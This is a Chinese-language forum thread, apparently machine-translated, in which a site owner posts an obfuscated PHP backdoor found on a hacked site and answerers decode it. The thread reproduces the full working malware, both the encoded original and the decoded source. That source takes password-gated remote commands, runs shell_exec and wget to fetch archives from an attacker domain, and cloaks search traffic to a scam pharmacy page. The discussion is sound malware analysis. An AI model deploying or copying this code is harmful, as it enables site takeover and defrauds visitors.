2015-05-01 75 views
5

已有人聽說過這個:航天-benchmark.php」腳本病毒

航天-benchmark.php腳本被上傳到我的網站,並做了那裏,我很好奇,他們做了什麼,因爲他們不是很惡毒。黑客只有改變了我的.htaccess文件,旁邊種植上述文件下面是代碼,有人知道它做什麼????

<?php $wzkaou="\x63"."\x72"."\x65"."\x61"."\x74"."e".chr(95).chr(102)."\x75"."\x6e"."\x63"."\x74"."\x69"."o"."n";$osyifa = $wzkaou('$a',strrev(';)a$(lave')); $osyifa(strrev(';))"==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"(edoced_46esab(lave'));?> 
+0

嘗試通過邏輯工作並找出自己。 – Mike

+0

這可能是GoDaddy方面的一般錯誤。也許你可以打開支持票並問他們。 您可以在security.stackexchange上看到類似的線程。 http://security.stackexchange.com/questions/90085/godaddy-website-hacked-via-php – az3

+0

這是有趣的人downvoting這同時這個網站正是爲了這個:討論代碼。它允許聰明的人閃耀,而不是那麼聰明,以獲得他們的答案和學習:)或者,也許它只是寫這樣的事情的黑客不希望別人知道他們是如何做的? – Svet

回答

8

第一行,我們有:

$wzkaou="\x63"."\x72"."\x65"."\x61"."\x74"."e".chr(95).chr(102)."\x75"."\x6e"."\x63"."\x74"."\x69"."o"."n"; 

因此,我們可以找出這樣做的位置:

echo $wzkaou; // outputs create_function 

下一行,我們有:

$osyifa = $wzkaou('$a',strrev(';)a$(lave')); 

因爲我們知道,$ wzkaou是'create_function',這是在這裏被調用的函數。第一個參數是'$a',第二個參數是:

echo strrev(';)a$(lave'); // eval($a); 

因此,我們正在執行基本上是:

create_function('$a', 'eval($a)'); 

獲取傳遞給這個函數同樣可以這樣確定的說法:

echo strrev(';))"==gCN0XCJoQD9lQCJo[...]dp1Was9VZtlGdfRXZzpQD"(edoced_46esab(lave'); 

而這個輸出:

eval(base64_decode("DQpzZXRfdGltZ[...]JCQl9DQoJCX0NCg==")); 

最後,當我們base64_decode()這一點,它產生:

set_time_limit(0); 

function get_page_by_curl($url,$useragent="Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.131 Safari/537.36"){ 
     $ch = curl_init(); 
     curl_setopt ($ch, CURLOPT_URL,$url); 
     curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1); 
     curl_setopt ($ch, CURLOPT_TIMEOUT, 30); 
     curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0); 
     curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0); 
     curl_setopt ($ch, CURLOPT_USERAGENT, $useragent); 
     $result = curl_exec ($ch); 
     curl_close($ch); 
     return $result; 
} 

     $doorcontent=""; 
     [email protected]$_POST["pppp_check"]; 
     $md5pass="e5e4570182820af0a183ce1520afe43b"; 

     [email protected]$_SERVER["HTTP_HOST"]; 
     [email protected]$_SERVER["REQUEST_URI"]; 
     $host=str_replace("www.","",$host); 
     $md5host=md5($host); 
     $urx=$host.$uri; 
     $md5urx=md5($urx); 

     if (function_exists('sys_get_temp_dir')) {$tmppath = sys_get_temp_dir();} else {$tmppath = (dirname(__FILE__));} 

     $cdir=$tmppath."/.".$md5host."/"; 



     $domain=base64_decode("ay1maXNoLWthLnJ1"); 

     if ($x!=""){ 
      $p=md5(base64_decode(@$_POST["p"])); 
      if ($p!=$md5pass)return; 

      if (($x=="2")||($x=="4")){ 
       echo "###UPDATING_FILES###\n"; 
       if ($x=="2"){ 
        $cmd="cd $tmppath; rm -rf .$md5host"; 
        echo shell_exec($cmd); 
       } 
       $cmd="cd $tmppath; wget http://$domain/outp/wp/arc/$md5host.tgz -O 1.tgz; tar -xzf 1.tgz; rm -rf 1.tgz"; 
       echo shell_exec($cmd); 
       exit; 
      } 
      if ($x=="3"){ 
       echo "###WORKED###\n";exit; 
      } 
     }else{ 
      $curx=$cdir.$md5urx; 
      if (@file_exists($curx)){ 
       @list($IDpack,$mk,$doorcontent)[email protected]("|||",@base64_decode(@file_get_contents($curx))); 
       $bot=0; 
       $se=0; 
       $mobile=0; 
       if (preg_match("#google|gsa-crawler|AdsBot-Google|Mediapartners|Googlebot-Mobile|spider|bot|yahoo|google web preview|mail\.ru|crawler|baiduspider#i", @$_SERVER["HTTP_USER_AGENT" ]))$bot=1; 
       if (preg_match("#android|symbian|iphone|ipad|series60|mobile|phone|wap|midp|mobi|mini#i", @$_SERVER["HTTP_USER_AGENT" ]))$mobile=1; 
       if (preg_match("#google|bing\.com|msn\.com|ask\.com|aol\.com|altavista|search|yahoo|conduit\.com|charter\.net|wow\.com|mywebsearch\.com|handycafe\.com|babylon\.com#i", @$_SERVER["HTTP_REFERER" ]))$se=1; 
       if ($bot) {echo $doorcontent;exit;} 
       if ($se) {echo get_page_by_curl("http://$domain/lp.php?ip=".$IDpack."&mk=".rawurlencode($mk)."&d=".$md5host."&u=".$md5urx."&addr=".$_SERVER["REMOTE_ADDR"],@$_SERVER["HTTP_USER_AGENT"]);exit;} 

       header($_SERVER['SERVER_PROTOCOL'] . " 404 Not Found"); 
       echo '<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">' . "\n"; 
       echo '<html><head>' . "\n"; 
       echo '<title>404 Not Found</title>' . "\n"; 
       echo '</head><body>' . "\n"; 
       echo '<h1>Not Found</h1>' . "\n"; 
       echo '<p>The requested URL ' . $_SERVER['REQUEST_URI'] . ' was not found on this server.</p>' . "\n"; 
       echo '<hr>' . "\n"; 
       echo '<address>' . $_SERVER['SERVER_SOFTWARE'] . ' PHP/' . phpversion() . ' Server at ' . $_SERVER['HTTP_HOST'] . ' Port 80</address>' . "\n"; 
       echo '</body></html>'; 
       exit; 
      }else{ 
       $crurl="http://"[email protected]$_SERVER['HTTP_HOST'][email protected]$_SERVER['REQUEST_URI']; 
       echo get_page_by_curl($crurl); 
      } 
     } 
+0

哇...邁克,我不認爲有人會投入如此多的工作來調查這件事。令人印象深刻!基本上,這是一個URL劫持腳本,就像我懷疑的一樣。 – Svet

5

麥克指出,你的代碼是一個混淆的不良(使用基地64字符串編碼和扭轉字符串/十六進制的方法來隱藏它,這很容易解碼)腳本。有可能這些方法只用於保持腳本不變(因爲普通文本字符串具有高度的可能性 - 基本64編碼可以保護這一點)。

看着解碼版本,它會出現它是一個腳本來加載網頁在k-fish-ka.ru/lp.php而不是你的網頁,當一個普通用戶從搜索引擎的結果加載你的網頁。直接導航到你的頁面不會加載假的網站而不是你的網站,所以你不會注意到它的區別,除非你在搜索引擎的結果中找到你的頁面(或僞造http頭說你從google.com中得到了測試) 。這可能就是爲什麼他們只在搜索引擎點擊中注入頁面,以便將其隱藏在通常直接訪問網站的網站創建者身上。

被注入的頁面本身是一個騙局在線藥店頁面(我不建議訪問源頁面,因爲它可能是一個騙局,但那是什麼)。該頁面似乎是從另一個網站www.maximumstoretabs.com(這很可能是一個騙局本身)的直接複製/粘貼,如頁面底部的版權信息所示。

1

此腳本包含其他內容可下載壓縮文件,該文件表面上包含其他惡意軟件或其他任何惡意軟件或詐騙者想要的任何內容。在我的情況下,有一個PHP郵件(可能用於垃圾郵件)和噸的base64編碼電子郵件與他們的可怕的東西保存到路徑$curx=$cdir.$md5urx;

這表明我管理的網站發生了同樣的事情。海基會(搜索引擎友好)Joomla鏈接停止工作。由於它們需要URL重寫。